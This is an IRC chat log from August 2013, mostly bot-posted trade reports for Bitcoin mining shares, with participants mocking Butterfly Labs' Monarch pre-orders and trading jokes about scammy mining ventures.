@ 3.821 BTC [-] Aug 17 23:46:48 [HAVELOCK] [AM100] 1 @ 0.0375001 BTC [-] Aug 17 23:48:48 [HAVELOCK] [AM100] 1 @ 0.0375 BTC [-] Aug 17 23:50:49 [HAVELOCK] [AM100] 29 @ 0.0374 = 1.0846 BTC [-] Aug 17 23:51:27 [BTCTC] [LABCOIN] 4800 @ 0.001635 = 7.848 BTC [+] Aug 17 23:52:34 [BTCTC] [ACTIVEMINING] 985 @ 0.005164 = 5.0865 BTC [-] Aug 17 23:52:36 [BTCTC] [ACTIVEMINING] 1000 @ 0.005162 = 5.162 BTC [-] Aug 17 23:52:37 [BTCTC] [ACTIVEMINING] 1015 @ 0.005161 = 5.2384 BTC [-] Aug 17 23:52:50 [HAVELOCK] [AM100] 8 @ 0.03730022 = 0.2984 BTC [-] Aug 17 23:54:51 [HAVELOCK] [AM100] 44 @ 0.03730006 = 1.6412 BTC [-] Aug 17 23:55:05 [BTCTC] [ACTIVEMINING] 127 @ 0.005165 = 0.656 BTC [+] Aug 17 23:55:19 [BTCTC] [ACTIVEMINING] 30 @ 0.005294 = 0.1588 BTC [+] Aug 17 23:55:21 [BTCTC] [ACTIVEMINING] 32 @ 0.005295 = 0.1694 BTC [+] Aug 17 23:55:35 [BTCTC] [ACTIVEMINING] 30 @ 0.005293 = 0.1588 BTC [-] Aug 17 23:55:47 [BTCTC] [ACTIVEMINING] 30 @ 0.005292 = 0.1588 BTC [-] Aug 17 23:55:48 [BTCTC] [ACTIVEMINING] 8 @ 0.005293 = 0.0423 BTC [+] Aug 17 23:56:09 [BTCTC] [ACTIVEMINING] 30 @ 0.005292 = 0.1588 BTC [-] Aug 17 23:56:27 [BTCTC] [ACTIVEMINING] 50 @ 0.005293 = 0.2647 BTC [+] Aug 17 23:56:39 [BTCTC] [ACTIVEMINING] 30 @ 0.005295 = 0.1589 BTC [+] Aug 17 23:56:52 [BTCTC] [ACTIVEMINING] 18 @ 0.005389 = 0.097 BTC [+] Aug 17 23:57:41 [BTCTC] [ACTIVEMINING] 8 @ 0.005389 = 0.0431 BTC [+] Aug 17 23:58:18 [BTCTC] [BTC-GROWTH] 10 @ 0.1055 = 1.055 BTC [+] Aug 17 23:59:38 [BTCTC] [LABCOIN] 40 @ 0.001637 = 0.0655 BTC [+] Aug 18 00:00:20 [BTCTC] [ASICMINER-PT] 1 @ 3.83 BTC [+] Aug 18 00:00:23 [BTCTC] [BTC-GROWTH] 3 @ 0.1053 = 0.3159 BTC [-] Aug 18 00:00:58 [BTCTC] [ACTIVEMINING] 1 @ 0.005176 BTC [-] Aug 18 00:01:04 [BTCTC] [BTC-GROWTH] 7 @ 0.1055 = 0.7385 BTC [+] Aug 18 00:01:25 [BTCTC] [BITVPS] 1 @ 0.002573 BTC [-] Aug 18 00:01:45 [HAVELOCK] [AM100] 12 @ 0.0375002 = 0.45 BTC [+] Aug 18 00:02:08 [BTCTC] [TAT.ASICMINER] 36 @ 0.0381 = 1.3716 BTC [+] Aug 18 00:03:20 [BTCTC] [LTC-ATF.B2] 1 @ 0.01044 BTC [-] Aug 18 00:04:19 [HAVELOCK] [AM100] 1 @ 0.0375002 BTC [+] Aug 18 00:04:50 [BTCTC] [BFMINES] 4 @ 0.001401 = 0.0056 BTC [-] Aug 18 00:05:02 http://www.butterflylabs.com/monarch/ Aug 18 00:05:03 The Monarch | Butterfly Labs Aug 18 00:05:36 HAHAHAHAAHA Aug 18 00:05:42 are you fucking shitting me Aug 18 00:05:44 ;;google venture the monarch Aug 18 00:05:44 The Monarch - Home of The People's Republic of Venture: ; The Monarch - Venture Brothers Wiki: ; List of The Venture Bros. characters - Wikipedia, the free encyclopedia: Aug 18 00:05:59 LOLOLOLOLOLOLOL Aug 18 00:06:43 [BTCTC] [BITVPS] 10 @ 0.00257 = 0.0257 BTC [-] Aug 18 00:07:28 [BTCTC] [S.MPOE-PT] 12 @ 0.0008601 = 0.0103 BTC [+] Aug 18 00:07:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.0381 = 0.0762 BTC [+] Aug 18 00:08:41 [BTCTC] [DMS.MINING] 3 @ 0.003491 = 0.0105 BTC [-] Aug 18 00:09:11 [BTCTC] [S.BBET-PT] 2 @ 0.001801 = 0.0036 BTC [-] Aug 18 00:09:12 [BTCTC] [S.BBET-PT] 4 @ 0.0018 = 0.0072 BTC [-] Aug 18 00:09:13 lmao Aug 18 00:09:25 they're not delivering more products ? Aug 18 00:09:49 [BTCTC] [RSM] 1 @ 0.0105 BTC [-] Aug 18 00:09:57 "You can apply the purchase price of any undelivered product towards a 28nm product by paying a 10% transfer fee. That will close out your old order and credit your account towards the purchase of a 28nm Monarch pre-order. However, we do recommend you keep your remaining 65nm orders and take delivery because you'll get your mining gear much sooner. 28nm products won't begin shipping Aug 18 00:09:57 til year end and the difficulty is expected to be much higher at that time. It's also worth pointing out that FPGA era products were still very valuable well into ASIC generation rollout, and the relative power difference between 65nm and 28nm is much much less. " Aug 18 00:10:12 hahaha Aug 18 00:10:18 [BTCTC] [LTC-ATF.B2] 2 @ 0.01025 = 0.0205 BTC [-] Aug 18 00:11:13 [BTCTC] [RSM] 1 @ 0.01021 BTC [-] Aug 18 00:11:15 [HAVELOCK] [XBOND] 100 @ 0.00107 = 0.107 BTC [-] Aug 18 00:12:12 [BTCTC] [NASTY-PT] 2 @ 0.003659 = 0.0073 BTC [-] Aug 18 00:12:33 everytime a bfl exec says "pre-order" someone should run up and kick them in the balls Aug 18 00:12:43 maybe they'll learn that way Aug 18 00:13:16 [BTCTC] [NASTY-PT] 47 @ 0.00399 = 0.1875 BTC [+] Aug 18 00:14:35 they named a chip after the worst super villian of all time? Aug 18 00:14:41 these guys are truly failures Aug 18 00:15:19 more like best supervillian Aug 18 00:17:54 [BTCTC] [TAT.ASICMINER] 3 @ 0.0384 = 0.1152 BTC [+] Aug 18 00:19:27 [BTCTC] [ACTIVEMINING] 4 @ 0.005176 = 0.0207 BTC [-] Aug 18 00:19:28 [BTCTC] [ACTIVEMINING] 64 @ 0.005175 = 0.3312 BTC [-] Aug 18 00:19:30 [BTCTC] [ACTIVEMINING] 32 @ 0.005161 = 0.1652 BTC [-] Aug 18 00:20:11 thestringpuller not sure if failures or very accomplished trolls. Aug 18 00:22:06 [BTCTC] [LABCOIN] 20 @ 0.001637 = 0.0327 BTC [+] Aug 18 00:25:22 Wow, November/December delivery Aug 18 00:25:27 impressive Aug 18 00:25:42 they mean nov/dec '14 Aug 18 00:26:36 this is not longer a race, but a clusterfuck Aug 18 00:27:07 [HAVELOCK] [AM100] 12 @ 0.0381999 = 0.4584 BTC [+] Aug 18 00:27:43 So they are esentially promissing that all current backorders will be gone by the time these new cards will ship, so before november the latest Aug 18 00:28:10 if I had a BFL order that I was waiting for I would definatily upgrade though, nothing to lose Aug 18 00:28:41 bobbabad nothing to gain, moreover. Aug 18 00:28:50 they've perfected the toxic relationship it seems Aug 18 00:29:08 [HAVELOCK] [AM100] 2 @ 0.0382 = 0.0764 BTC [+] Aug 18 00:29:34 mircea_popescu a way to keep the scam going? Aug 18 00:29:36 well, sure its another gamble, but the option in just waiting for something that is not going to return roi is just giving up Aug 18 00:29:50 it seems that if they are unable to fill all orders placed it is essentially a ponzi with hardware Aug 18 00:30:05 it looks pretty flashy I must admit lol Aug 18 00:30:08 bobbabad it's not another "gamble". Aug 18 00:30:14 there's no uncertainity involved. Aug 18 00:31:01 [BTCTC] [DMS.MINING] 3 @ 0.003491 = 0.0105 BTC [-] Aug 18 00:31:02 [BTCTC] [DMS.MINING] 10 @ 0.003491 = 0.0349 BTC [-] Aug 18 00:31:03 [BTCTC] [DMS.MINING] 20 @ 0.003351 = 0.067 BTC [-] Aug 18 00:31:04 [BTCTC] [DMS.MINING] 4 @ 0.003351 = 0.0134 BTC [-] Aug 18 00:31:06 [BTCTC] [DMS.MINING] 321 @ 0.00335 = 1.0754 BTC [-] Aug 18 00:31:07 [BTCTC] [DMS.MINING] 14 @ 0.0033 = 0.0462 BTC [-] Aug 18 00:31:08 [BTCTC] [DMS.MINING] 3 @ 0.00326 = 0.0098 BTC [-] Aug 18 00:31:09 [BTCTC] [DMS.MINING] 38 @ 0.00325 = 0.1235 BTC [-] Aug 18 00:31:10 [BTCTC] [DMS.MINING] 587 @ 0.0032 = 1.8784 BTC [-] Aug 18 00:31:12 [HAVELOCK] [AM100] 5 @ 0.0382 = 0.191 BTC [+] Aug 18 00:31:18 .d Aug 18 00:31:19 50810339.04828 | Next Diff in 1308 blocks | Estimated Change: 18.8272% in 7d 8h 53m 23s Aug 18 00:31:21 give them your money in order to lose it, it's pretty much going to happen that way for anyone who buys from them Aug 18 00:31:40 weren't there like 4 bitbets? Aug 18 00:31:45 each coming out the same? Aug 18 00:32:39 ;;nethash Aug 18 00:32:40 458875.36788 Aug 18 00:33:10 [HAVELOCK] [AM100] 5 @ 0.0382 = 0.191 BTC [+] Aug 18 00:34:40 [BTCTC] [DMS.SELLING] 42 @ 0.01774 = 0.7451 BTC [+] Aug 18 00:34:40 [BTCTC] [DMS.SELLING] 50 @ 0.01775 = 0.8875 BTC [+] Aug 18 00:35:10 [HAVELOCK] [AM100] 2 @ 0.03849999 = 0.077 BTC [+] Aug 18 00:35:24 [BTCTC] [DMS.SELLING] 78 @ 0.01775 = 1.3845 BTC [+] Aug 18 00:35:26 [BTCTC] [DMS.MINING] 78 @ 0.0032 = 0.2496 BTC [-] Aug 18 00:35:32 [BTCTC] [DMS.PURCHASE] 78 @ 0.02074 = 1.6177 BTC [-] Aug 18 00:36:19 [BTCTC] [DMS.PURCHASE] 50 @ 0.02074 = 1.037 BTC [-] Aug 18 00:37:01 [BTCTC] [LABCOIN] 80 @ 0.001635 = 0.1308 BTC [-] Aug 18 00:37:04 [BTCTC] [DMS.SELLING] 15 @ 0.01775 = 0.2663 BTC [+] Aug 18 00:37:20 [BTCTC] [DMS.MINING] 15 @ 0.003201 = 0.048 BTC [+] Aug 18 00:37:28 [BTCTC] [DMS.PURCHASE] 15 @ 0.02074 = 0.3111 BTC [-] Aug 18 00:37:53 [BTCTC] [LABCOIN] 120 @ 0.001635 = 0.1962 BTC [-] Aug 18 00:37:54 [BTCTC] [LABCOIN] 180 @ 0.001631 = 0.2936 BTC [-] Aug 18 00:39:33 [HAVELOCK] [CFIG] 7 @ 0.15 = 1.05 BTC Aug 18 00:39:58 thestringpuller yep. eventually people just quyit betting. Aug 18 00:41:01 [BTCTC] [DMS.MINING] 5 @ 0.003201 = 0.016 BTC [+] Aug 18 00:41:03 [BTCTC] [DMS.MINING] 45 @ 0.0032 = 0.144 BTC [-] Aug 18 00:49:09 ActiveMining: Total shares: 6898797, Shareholders: 700, Average share per owner: 9855, Largest shareholder: 642022, Share top 7 (1%): 1858592 (27% of total) Aug 18 00:49:17 G.ASICMINER-PT: Total shares: 13525, Shareholders: 396, Average share per owner: 34, Largest shareholder: 1345, Share top 3 (1%): 2950 (22% of total) Aug 18 00:49:25 IceDrill.ASIC: Total shares: 30000000, Shareholders: 427, Average share per owner: 70257, Largest shareholder: 15500000, Share top 4 (1%): 25433659 (85% of total) Aug 18 00:49:53 Interesting to see how for IceDrill, the top 4 owners own 85% of all shares Aug 18 00:50:17 [BTCTC] [ACTIVEMINING] 24 @ 0.0052 = 0.1248 BTC [+] Aug 18 00:52:33 [HAVELOCK] [XBOND] 1 @ 0.00107 BTC [-] Aug 18 00:56:32 mircea_popescu: I do like how the free market eventually crushes the scammors. But I do hate how slow it takes for them to get crushed. Feels like this new slew of mining companies are the scammors who weren't killed off by the penecillin back in the GLBSE days, and have evolved into scammor form level 2. Aug 18 00:57:17 thestringpuller well the stubborn idiocy of people like kleeck etc does help loads. Aug 18 00:58:51 [BTCTC] [DMS.PURCHASE] 22 @ 0.02074 = 0.4563 BTC [-] Aug 18 01:00:44 mircea_popescu: may have sent you this before but this sounds just like your options market: "Some theorists charge that a free monetary system would be unwise, because it would not "stabilize the price level," i.e., the price of the money-unit. Money, they say, is supposed to be a fixed yardstick that never changes. Therefore, its value, or purchasing power, should be stabilized. Since the price of money would a Aug 18 01:04:23 [BTCTC] [COGNITIVE] 4 @ 0.361 = 1.444 BTC [-] Aug 18 01:05:26 thestringpuller ya well, theorists. Aug 18 01:05:34 we're doing teh practice atm. who's to know. Aug 18 01:07:55 [BTCTC] [ACTIVEMINING] 30 @ 0.00529 = 0.1587 BTC [+] Aug 18 01:07:56 [BTCTC] [ACTIVEMINING] 34 @ 0.005289 = 0.1798 BTC [-] Aug 18 01:09:00 hmm Aug 18 01:09:28 [BTCTC] [ACTIVEMINING] 1 @ 0.00532 BTC [+] Aug 18 01:09:41 but MPOE can insure purchasing power, so is the theory matching with the practice? Aug 18 01:09:50 too soon to say imo. Aug 18 01:10:23 noble Aug 18 01:10:35 once we get past this ridiculous point of adolescence where every idiot thinks they're relatively important and know better and whatnot, Aug 18 01:10:46 we might see some stuff that actually matters humbly studied for general benefit. Aug 18 01:10:50 may be a decade or two tho. Aug 18 01:11:09 [HAVELOCK] [XBOND] 2 @ 0.00107 = 0.0021 BTC [-] Aug 18 01:12:20 [BTCTC] [ACTIVEMINING] 2 @ 0.00539 = 0.0108 BTC [+] Aug 18 01:12:34 !ticker m ^OIX Aug 18 01:12:35 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Aug 18 01:14:11 hm Aug 18 01:15:05 im looking for that pic where bitcoin bitch spanks fiat bitch Aug 18 01:15:14 one was redhead Aug 18 01:18:03 http://polimedia.us/dtng/c/ Aug 18 01:18:05 somewhere in there. Aug 18 01:18:06 cyber Aug 18 01:21:40 http://polimedia.us/dtng/c/src/136542105834.jpg Aug 18 01:22:27 haha I posted that pic somewhere a few days ago (without legends) Aug 18 01:22:58 but in the real world fiat does not enjoy it Aug 18 01:23:54 pankkake http://polimedia.us/dtng/c/res/15234.html#i18809 thing's from like april Aug 18 01:24:17 yes mircea_popescu! thanks Aug 18 01:24:18 back when iirc btc was shooting up Aug 18 01:32:05 [HAVELOCK] [XBOND] 1 @ 0.00107 BTC [-] Aug 18 01:46:09 [BTCTC] [LABCOIN] 20 @ 0.001634 = 0.0327 BTC [+] Aug 18 01:46:11 [BTCTC] [LABCOIN] 58 @ 0.001633 = 0.0947 BTC [-] Aug 18 01:48:28 [BTCTC] [BTC-TRADING-PT] 14 @ 0.9436 = 13.2104 BTC [+] Aug 18 01:55:04 [HAVELOCK] [AM100] 10 @ 0.0376006 = 0.376 BTC [-] Aug 18 01:57:05 [HAVELOCK] [AM100] 12 @ 0.0376001 = 0.4512 BTC [-] Aug 18 01:59:06 [HAVELOCK] [AM100] 1 @ 0.0376 BTC [-] Aug 18 02:01:07 [HAVELOCK] [AM100] 1 @ 0.0375 BTC [-] Aug 18 02:03:07 [HAVELOCK] [AM100] 6 @ 0.03730006 = 0.2238 BTC [-] Aug 18 02:03:54 [BTCTC] [COGNITIVE] 1 @ 0.361 BTC [-] Aug 18 02:03:55 [BTCTC] [COGNITIVE] 1 @ 0.361 BTC [-] Aug 18 02:05:09 [HAVELOCK] [AM100] 20 @ 0.03730005 = 0.746 BTC [-] Aug 18 02:36:32 [HAVELOCK] [AM100] 11 @ 0.0372001 = 0.4092 BTC [-] Aug 18 02:40:35 [HAVELOCK] [AM100] 9 @ 0.0372001 = 0.3348 BTC [-] Aug 18 02:42:12 [BTCTC] [ACTIVEMINING] 30 @ 0.005367 = 0.161 BTC [-] Aug 18 02:42:59 [BTCTC] [ACTIVEMINING] 30 @ 0.005365 = 0.161 BTC [-] Aug 18 02:43:22 [BTCTC] [ACTIVEMINING] 30 @ 0.005364 = 0.1609 BTC [-] Aug 18 02:43:23 [BTCTC] [ACTIVEMINING] 8 @ 0.005365 = 0.0429 BTC [+] Aug 18 02:53:02 [HAVELOCK] [AM100] 1 @ 0.0372002 BTC [+] Aug 18 02:58:42 [MPEX] [S.MPOE] 1400 @ 0.00083754 = 1.1726 BTC [+] Aug 18 03:01:10 [BTCTC] [LABCOIN] 199 @ 0.001633 = 0.325 BTC [-] Aug 18 03:02:36 [HAVELOCK] [SDSTM] 29 @ 0.006 = 0.174 BTC [-] Aug 18 03:03:12 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.001186 = 0.0047 BTC [-] Aug 18 03:06:48 [HAVELOCK] [SDSTM] 88 @ 0.0056172 = 0.4943 BTC [-] Aug 18 03:08:24 [BTCTC] [ACTIVEMINING] 61 @ 0.00537 = 0.3276 BTC [+] Aug 18 03:11:37 [HAVELOCK] [HIM] 10 @ 0.188 = 1.88 BTC [+] Aug 18 03:18:43 [BTCTC] [BFMINES] 10 @ 0.0014 = 0.014 BTC [-] Aug 18 03:23:59 [BTCTC] [BTC-GROWTH] 5 @ 0.1049 = 0.5245 BTC [-] Aug 18 03:35:44 [BTCTC] [BITVPS] 50 @ 0.002573 = 0.1287 BTC [+] Aug 18 03:37:17 [HAVELOCK] [XBOND] 34 @ 0.001068 = 0.0363 BTC [-] Aug 18 03:37:23 [BTCTC] [DMS.MINING] 20 @ 0.003203 = 0.0641 BTC [+] Aug 18 03:39:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.0384 = 0.1152 BTC [+] Aug 18 03:40:23 [BTCTC] [LABCOIN] 1 @ 0.001634 BTC [+] Aug 18 03:40:49 [HAVELOCK] [AM100] 9 @ 0.0372005 = 0.3348 BTC [+] Aug 18 03:44:00 [HAVELOCK] [AM100] 1 @ 0.0372005 BTC [+] Aug 18 03:48:11 [HAVELOCK] [XBOND] 12 @ 0.00107 = 0.0128 BTC [+] Aug 18 03:48:31 [BTCTC] [TAT.ASICMINER] 39 @ 0.03811 = 1.4863 BTC [-] Aug 18 03:52:08 [BTCTC] [LABCOIN] 30 @ 0.001655 = 0.0497 BTC [+] Aug 18 03:52:09 [BTCTC] [LABCOIN] 12 @ 0.001671 = 0.0201 BTC [+] Aug 18 03:52:10 [BTCTC] [LABCOIN] 100 @ 0.001672 = 0.1672 BTC [+] Aug 18 03:52:12 [BTCTC] [LABCOIN] 25 @ 0.001673 = 0.0418 BTC [+] Aug 18 03:52:13 [BTCTC] [LABCOIN] 201 @ 0.001674 = 0.3365 BTC [+] Aug 18 03:52:14 [BTCTC] [LABCOIN] 29 @ 0.001676 = 0.0486 BTC [+] Aug 18 03:52:15 [BTCTC] [LABCOIN] 103 @ 0.001677 = 0.1727 BTC [+] Aug 18 03:57:26 [BTCTC] [DMS.SELLING] 9 @ 0.01777 = 0.1599 BTC [+] Aug 18 03:57:27 [BTCTC] [DMS.SELLING] 11 @ 0.01797 = 0.1977 BTC [+] Aug 18 03:57:29 [BTCTC] [DMS.SELLING] 30 @ 0.01798 = 0.5394 BTC [+] Aug 18 04:01:43 [BTCTC] [ASICMINER-PT] 6 @ 3.83 = 22.98 BTC [+] Aug 18 04:01:45 [BTCTC] [ASICMINER-PT] 5 @ 3.83 = 19.15 BTC [+] Aug 18 04:03:10 [BTCTC] [ASICMINER-PT] 1 @ 3.821 BTC [-] Aug 18 04:06:32 [BTCTC] [BTC-GROWTH] 1 @ 0.1019 BTC [-] Aug 18 04:08:11 [BTCTC] [DMS.SELLING] 100 @ 0.01777 = 1.777 BTC [-] Aug 18 04:08:13 [BTCTC] [DMS.MINING] 20 @ 0.003215 = 0.0643 BTC [+] Aug 18 04:08:14 [BTCTC] [DMS.MINING] 80 @ 0.003215 = 0.2572 BTC [+] Aug 18 04:08:16 [BTCTC] [DMS.PURCHASE] 100 @ 0.02074 = 2.074 BTC [-] Aug 18 04:08:54 [BTCTC] [DMS.SELLING] 25 @ 0.01777 = 0.4443 BTC [-] Aug 18 04:08:56 [BTCTC] [DMS.MINING] 25 @ 0.003215 = 0.0804 BTC [+] Aug 18 04:08:58 [BTCTC] [DMS.PURCHASE] 25 @ 0.02074 = 0.5185 BTC [-] Aug 18 04:09:39 [BTCTC] [DMS.SELLING] 75 @ 0.01777 = 1.3328 BTC [-] Aug 18 04:09:41 [BTCTC] [DMS.MINING] 75 @ 0.003214 = 0.2411 BTC [-] Aug 18 04:09:43 [BTCTC] [DMS.PURCHASE] 75 @ 0.02074 = 1.5555 BTC [-] Aug 18 04:10:59 [BTCTC] [DMS.SELLING] 25 @ 0.01777 = 0.4443 BTC [-] Aug 18 04:11:01 [BTCTC] [DMS.MINING] 25 @ 0.003214 = 0.0804 BTC [-] Aug 18 04:11:03 [BTCTC] [DMS.PURCHASE] 25 @ 0.02074 = 0.5185 BTC [-] Aug 18 04:11:44 [BTCTC] [DMS.SELLING] 2 @ 0.01777 = 0.0355 BTC [-] Aug 18 04:11:46 [BTCTC] [DMS.MINING] 2 @ 0.003203 = 0.0064 BTC [-] Aug 18 04:11:48 [BTCTC] [DMS.PURCHASE] 2 @ 0.02074 = 0.0415 BTC [-] Aug 18 04:12:27 [BTCTC] [DMS.SELLING] 1 @ 0.01777 BTC [-] Aug 18 04:12:29 [BTCTC] [DMS.MINING] 1 @ 0.003202 BTC [-] Aug 18 04:12:31 [BTCTC] [DMS.PURCHASE] 1 @ 0.02074 BTC [-] Aug 18 04:13:12 [BTCTC] [DMS.SELLING] 1 @ 0.01777 BTC [-] Aug 18 04:13:14 [BTCTC] [DMS.MINING] 1 @ 0.003202 BTC [-] Aug 18 04:13:15 [BTCTC] [DMS.PURCHASE] 1 @ 0.02074 BTC [-] Aug 18 04:13:56 [BTCTC] [DMS.SELLING] 98 @ 0.01777 = 1.7415 BTC [-] Aug 18 04:13:58 [BTCTC] [DMS.SELLING] 235 @ 0.01777 = 4.176 BTC [-] Aug 18 04:13:59 [BTCTC] [DMS.MINING] 98 @ 0.0032 = 0.3136 BTC [-] Aug 18 04:14:01 [BTCTC] [DMS.PURCHASE] 98 @ 0.02074 = 2.0325 BTC [-] Aug 18 04:14:36 [BTCTC] [DMS.PURCHASE] 1000 @ 0.02074 = 20.74 BTC [-] Aug 18 04:19:48 [BTCTC] [DMS.MINING] 20 @ 0.003201 = 0.064 BTC [+] Aug 18 04:19:50 [BTCTC] [DMS.MINING] 215 @ 0.0032 = 0.688 BTC [-] Aug 18 04:22:40 [HAVELOCK] [XBOND] 10 @ 0.00107 = 0.0107 BTC [+] Aug 18 04:25:13 [HAVELOCK] [XBOND] 2 @ 0.00107 = 0.0021 BTC [+] Aug 18 04:25:53 [BTCTC] [DMS.PURCHASE] 202 @ 0.02074 = 4.1895 BTC [-] Aug 18 04:27:16 [BTCTC] [DMS.PURCHASE] 500 @ 0.02074 = 10.37 BTC [-] Aug 18 04:38:51 [BTCTC] [LABCOIN] 164 @ 0.001639 = 0.2688 BTC [-] Aug 18 04:38:52 [BTCTC] [LABCOIN] 1986 @ 0.00164 = 3.257 BTC [+] Aug 18 04:39:56 [BTCTC] [LABCOIN] 649 @ 0.00164 = 1.0644 BTC [+] Aug 18 04:43:09 [HAVELOCK] [XBOND] 2 @ 0.001068 = 0.0021 BTC [-] Aug 18 04:57:35 [HAVELOCK] [XBOND] 1 @ 0.0011 BTC [+] Aug 18 05:00:59 [HAVELOCK] [LABCO] 20 @ 0.00167 = 0.0334 BTC [-] Aug 18 05:04:38 [HAVELOCK] [LABCO] 10 @ 0.00166001 = 0.0166 BTC [-] Aug 18 05:08:40 [BTCTC] [BTC-GROWTH] 5 @ 0.102 = 0.51 BTC [+] Aug 18 05:08:42 [BTCTC] [BTC-GROWTH] 33 @ 0.1019 = 3.3627 BTC [-] Aug 18 05:09:39 [HAVELOCK] [XBOND] 8 @ 0.0010652 = 0.0085 BTC [-] Aug 18 05:10:19 [BTCTC] [BTC-GROWTH] 200 @ 0.1019 = 20.38 BTC [-] Aug 18 05:12:12 [HAVELOCK] [XBOND] 45 @ 0.0011 = 0.0495 BTC [+] Aug 18 05:15:31 [HAVELOCK] [XBOND] 6 @ 0.001065 = 0.0064 BTC [-] **** BEGIN LOGGING AT Sun Aug 18 12:46:33 2013 Aug 18 12:52:09 [BTCTC] [ACTIVEMINING] 722 @ 0.005277 = 3.81 BTC [+] Aug 18 12:56:11 [BTCTC] [BTC-GROWTH] 15 @ 0.1003 = 1.5045 BTC [-] Aug 18 12:56:40 [BTCTC] [ASICMINER-PT] 1 @ 3.819 BTC [-] Aug 18 12:59:36 [BTCTC] [DMS.MINING] 1 @ 0.003298 BTC [+] Aug 18 13:02:09 lol Aug 18 13:09:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.0383 = 0.383 BTC [+] Aug 18 13:27:30 [HAVELOCK] [AM1] 1 @ 3.85 BTC [-] Aug 18 13:29:30 [HAVELOCK] [AM1] 2 @ 3.83 = 7.66 BTC [-] Aug 18 13:31:30 [HAVELOCK] [AM1] 1 @ 3.81 BTC [-] Aug 18 13:32:17 [BTCTC] [LABCOIN] 9000 @ 0.00167 = 15.03 BTC [-] Aug 18 13:33:16 [BTCTC] [LABCOIN] 22 @ 0.001665 = 0.0366 BTC [-] Aug 18 13:33:46 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1989 = 0.3978 BTC [-] Aug 18 13:36:17 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001187 BTC [+] Aug 18 13:52:21 [BTCTC] [DMS.MINING] 2 @ 0.003298 = 0.0066 BTC [+] Aug 18 13:52:33 [BTCTC] [DMS.MINING] 15 @ 0.003298 = 0.0495 BTC [+] Aug 18 14:00:17 [BTCTC] [RSM] 1 @ 0.01 BTC [-] Aug 18 14:01:45 [BTCTC] [DMS.MINING] 12 @ 0.003298 = 0.0396 BTC [+] Aug 18 14:04:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.03811 BTC [-] Aug 18 14:05:06 [BTCTC] [TAT.ASICMINER] 10 @ 0.038 = 0.38 BTC [-] Aug 18 14:11:01 [BTCTC] [DMS.MINING] 16 @ 0.003298 = 0.0528 BTC [+] Aug 18 14:22:54 [BTCTC] [DMS.MINING] 2 @ 0.003298 = 0.0066 BTC [+] Aug 18 14:27:59 [BTCTC] [BTC-BOND] 1 @ 0.009807 BTC [-] Aug 18 14:27:59 [BTCTC] [BTC-BOND] 5 @ 0.009805 = 0.049 BTC [-] Aug 18 14:28:00 [BTCTC] [BTC-BOND] 4 @ 0.009804 = 0.0392 BTC [-] Aug 18 14:29:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0379 BTC [-] Aug 18 14:30:18 [BTCTC] [TAT.ASICMINER] 15 @ 0.03788 = 0.5682 BTC [-] Aug 18 14:31:46 [BTCTC] [ASICMINER-PT] 1 @ 3.81 BTC [-] Aug 18 14:31:47 [BTCTC] [ASICMINER-PT] 3 @ 3.81 = 11.43 BTC [-] Aug 18 14:31:49 [BTCTC] [ASICMINER-PT] 4 @ 3.807 = 15.228 BTC [-] Aug 18 14:31:50 [BTCTC] [ASICMINER-PT] 8 @ 3.806 = 30.448 BTC [-] Aug 18 14:36:04 [BTCTC] [DMS.MINING] 17 @ 0.003298 = 0.0561 BTC [+] Aug 18 14:37:15 kakobrekla https://bitcointalk.org/index.php?topic=211115.msg2940199#msg2940199 Aug 18 14:37:24 your milk! where is your milk nao ? Aug 18 14:38:10 [BTCTC] [DMS.MINING] 37 @ 0.003298 = 0.122 BTC [+] Aug 18 14:42:29 [BTCTC] [ASICMINER-PT] 1 @ 3.807 BTC [+] Aug 18 14:42:30 [BTCTC] [ASICMINER-PT] 3 @ 3.806 = 11.418 BTC [-] Aug 18 14:42:43 [BTCTC] [DMS.MINING] 201 @ 0.003298 = 0.6629 BTC [+] Aug 18 14:47:15 [BTCTC] [DMS.MINING] 35 @ 0.003298 = 0.1154 BTC [+] Aug 18 14:52:51 [BTCTC] [DMS.MINING] 10 @ 0.003298 = 0.033 BTC [+] Aug 18 14:53:16 [HAVELOCK] [AM1] 1 @ 3.81 BTC [-] Aug 18 15:08:17 [BTCTC] [LABCOIN] 1 @ 0.001661 BTC [-] Aug 18 15:12:51 [BTCTC] [LABCOIN] 13 @ 0.001682 = 0.0219 BTC [+] Aug 18 15:20:51 [MPEX] [S.MPOE] 1507 @ 0.00083497 = 1.2583 BTC [-] Aug 18 15:21:08 (ANNOUNCE) [IPO] 100 PetaHash mining farm, expected to be running at 95% capacity within 5 hours from now, using latest 3 picometer chip technology, IPO of 100,000,000 shares at 3.77 btc each starting NAO!! Aug 18 15:22:26 oh yeah, it's called A-SICK-DRILLBIT Aug 18 15:23:39 within 5 hours of two weeks later. Aug 18 15:23:54 projected dividend earning in one month to exceed the world GDP by 2760% Aug 18 15:24:56 this is too low for me sorry. Aug 18 15:25:07 :( Aug 18 15:25:21 can the dividend be a slice of pizza ? Aug 18 15:25:24 i'd be interested then. Aug 18 15:25:55 well one pizza is about 10,000 btc Aug 18 15:26:01 so yes. Aug 18 15:26:18 great! where do i send my reddit gold, btctalk tips and dice gains ? Aug 18 15:27:32 just delete them. Aug 18 15:27:56 erm n/m Aug 18 15:28:35 anyways, we need some damn NEWS Aug 18 15:28:39 anything Aug 18 15:28:52 other than bfl stuff.. Aug 18 15:29:35 i was surprised they didn't call it the Luke Aug 18 15:31:54 [BTCTC] [DMS.MINING] 7 @ 0.003298 = 0.0231 BTC [+] Aug 18 15:43:48 [BTCTC] [FIMB] 115 @ 0.0105 = 1.2075 BTC [+] Aug 18 15:43:49 [BTCTC] [FIMB] 250 @ 0.0105 = 2.625 BTC [+] Aug 18 15:43:50 [BTCTC] [FIMB] 250 @ 0.0106 = 2.65 BTC [+] Aug 18 15:47:31 [HAVELOCK] [XBOND] 10 @ 0.0010999 = 0.011 BTC [-] Aug 18 15:56:04 [HAVELOCK] [XBOND] 1 @ 0.00105802 BTC [-] Aug 18 16:01:24 [BTCTC] [LABCOIN] 30 @ 0.00166 = 0.0498 BTC [-] Aug 18 16:07:22 